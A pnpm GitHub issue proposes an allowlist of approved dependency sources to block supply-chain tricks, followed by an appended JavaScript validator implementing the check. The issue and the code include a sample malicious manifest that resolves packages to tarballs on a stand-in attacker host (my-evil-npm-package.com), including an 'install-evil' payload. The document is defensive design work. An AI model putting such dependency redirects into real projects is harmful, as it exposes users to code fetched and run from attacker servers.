Allowlist of unusual dependency resolutions #5612

Open

Jack-Works opened this issue Nov 10, 2022 · 1 comment

Comments

@Jack-Works (Member)

Describe the user story

In #4001 we discussed the possibility of evil packages using the npm alias to bypass the onlyBuiltDependencies limitation. Currently, we're using a .pnpmfile to manually implement the allow list.

Describe the solution you'd like

A new field in package.json/pnpm called approvedUnusualResolution

```json
{
    "pnpm": {
        "approvedUnusualResolution": {
            "wyvern-js": [
                "git+https://github.com/ProjectOpenSea/wyvern-js.git#v3.2.1",
                "github:ProjectOpenSea/wyvern-js#semver:^3.2.1"
            ]
        },
        "onlyBuiltDependencies": ["another-package-that-requires-install-script"]
    }
}
```

Then if a dependency `looks-normal-but-evil` tries to declare its dependencies as:

```json
{
    "dependencies": {
        "wyvern-js": "https://my-evil-npm-package.com/wyvern-js.tar.gz",
        "another-package-that-requires-install-script": "https://my-evil-npm-package.com/install-evil.tar.gz"
    }
}
```

pnpm will fail with the following message and it will not try to install/execute lifecycle scripts.

```text
Cannot install "looks-normal-but-evil@0.0.1":

    It depends on "wyvern-js", but using an unapproved source "https://my-evil-npm-package.com/wyvern-js.tar.gz"
    It depends on "another-package-that-requires-install-script", but using an unapproved source "https://my-evil-npm-package.com/install-evil.tar.gz"
```

Describe the drawbacks of your solution

Describe alternatives you've considered

@zkochan (Member) commented Nov 14, 2022

I think approvedUnusualResolution is not a good name. Why are they unusual? They are just one of the supported sources.

Also, I don't understand why the package's alias is needed in this setting. Just the source should be enough:

```json
{
    "pnpm": {
        "approvedUnusualResolution": [
            "git+https://github.com/ProjectOpenSea/wyvern-js.git#v3.2.1",
            "github:ProjectOpenSea/wyvern-js#semver:^3.2.1"
        ],
        "onlyBuiltDependencies": ["another-package-that-requires-install-script"]
    }
}
```

And it might be too verbose if the exact resolved specs have to be listed. So when you update wyvern-js, you'll have to update this config.
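The following is an added example, not pnpm's own code or anything proposed verbatim in this thread. It models the install-time check described in the issue body (a guarded package name may only be pulled from the registry or from an explicitly approved source) and accepts both configuration shapes discussed above: the per-name map from the proposal and the flat list of sources from the reply. The set of non-registry spec prefixes, the `isUnusualSpec` / `checkManifest` function names and the sample manifests are assumptions made for this example; the `npm:` prefix is included so that the alias trick from #4001 (an allowlisted name aliased to a different package) is reported rather than silently accepted.

```javascript
'use strict';

// Added example, not pnpm's implementation. Names listed under
// approvedUnusualResolution or onlyBuiltDependencies are "guarded": a
// dependency may only pull them from the registry (plain semver/tag spec)
// or from a source that the root package.json explicitly approves.

// Specs that bypass the configured registry. This list is an assumption for
// the example; pnpm's resolver recognises more protocols than these.
const NON_REGISTRY_PREFIXES = [
  'git+', 'git:', 'github:', 'gitlab:', 'bitbucket:',
  'http:', 'https:', 'file:', 'link:', 'npm:',
];

function isUnusualSpec(spec) {
  const s = String(spec).trim();
  if (NON_REGISTRY_PREFIXES.some((p) => s.startsWith(p))) return true;
  // Bare GitHub shorthand such as "owner/repo#tag" (no protocol prefix).
  return /^[\w.-]+\/[\w.-]+(?:#.*)?$/.test(s);
}

// Normalise both config shapes: the per-name map ({ name: [sources] }) from
// the proposal, and the flat list of sources ([sources]) from the reply.
function approvedSources(pnpmConfig) {
  const cfg = pnpmConfig.approvedUnusualResolution || {};
  const perName = new Map();
  const anyName = new Set();
  if (Array.isArray(cfg)) {
    for (const src of cfg) anyName.add(src);
  } else {
    for (const [name, sources] of Object.entries(cfg)) perName.set(name, new Set(sources));
  }
  return { perName, anyName };
}

// Returns { ok, problems, message }; message is formatted like the error
// text proposed in the issue.
function checkManifest(pnpmConfig, manifest) {
  const { perName, anyName } = approvedSources(pnpmConfig);
  const guarded = new Set([...perName.keys(), ...(pnpmConfig.onlyBuiltDependencies || [])]);
  const deps = { ...(manifest.dependencies || {}), ...(manifest.optionalDependencies || {}) };
  const problems = [];
  for (const [name, spec] of Object.entries(deps)) {
    if (!guarded.has(name) || !isUnusualSpec(spec)) continue;
    const approved = anyName.has(spec) || (perName.get(name) || new Set()).has(spec);
    if (!approved) problems.push({ name, spec });
  }
  const header = `Cannot install "${manifest.name}@${manifest.version}":`;
  const lines = problems.map(
    (p) => `    It depends on "${p.name}", but using an unapproved source "${p.spec}"`,
  );
  return {
    ok: problems.length === 0,
    problems,
    message: problems.length ? [header, '', ...lines].join('\n') : '',
  };
}

// Constructed sample: the root "pnpm" block from the proposal.
const PNPM_CONFIG = {
  approvedUnusualResolution: {
    'wyvern-js': [
      'git+https://github.com/ProjectOpenSea/wyvern-js.git#v3.2.1',
      'github:ProjectOpenSea/wyvern-js#semver:^3.2.1',
    ],
  },
  onlyBuiltDependencies: ['another-package-that-requires-install-script'],
};

// Constructed sample: the malicious transitive dependency from the issue.
const EVIL_MANIFEST = {
  name: 'looks-normal-but-evil',
  version: '0.0.1',
  dependencies: {
    'wyvern-js': 'https://my-evil-npm-package.com/wyvern-js.tar.gz',
    'another-package-that-requires-install-script': 'https://my-evil-npm-package.com/install-evil.tar.gz',
  },
};

// Constructed sample: an honest package using an approved git source, the
// registry for a guarded name, and an unguarded git dependency (allowed).
const HONEST_MANIFEST = {
  name: 'honest-package',
  version: '1.0.0',
  dependencies: {
    'wyvern-js': 'github:ProjectOpenSea/wyvern-js#semver:^3.2.1',
    'another-package-that-requires-install-script': '^2.0.0',
    'unrelated-git-dep': 'git+https://example.invalid/unrelated.git',
  },
};

console.log(checkManifest(PNPM_CONFIG, EVIL_MANIFEST).message);
console.log('honest ok:', checkManifest(PNPM_CONFIG, HONEST_MANIFEST).ok);
```

With the flat-list shape, there are no per-name keys, so only the names in `onlyBuiltDependencies` are guarded; that is the trade-off the reply points at, and it also shows why the exact spec strings have to be kept in sync with whatever the honest packages currently declare.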
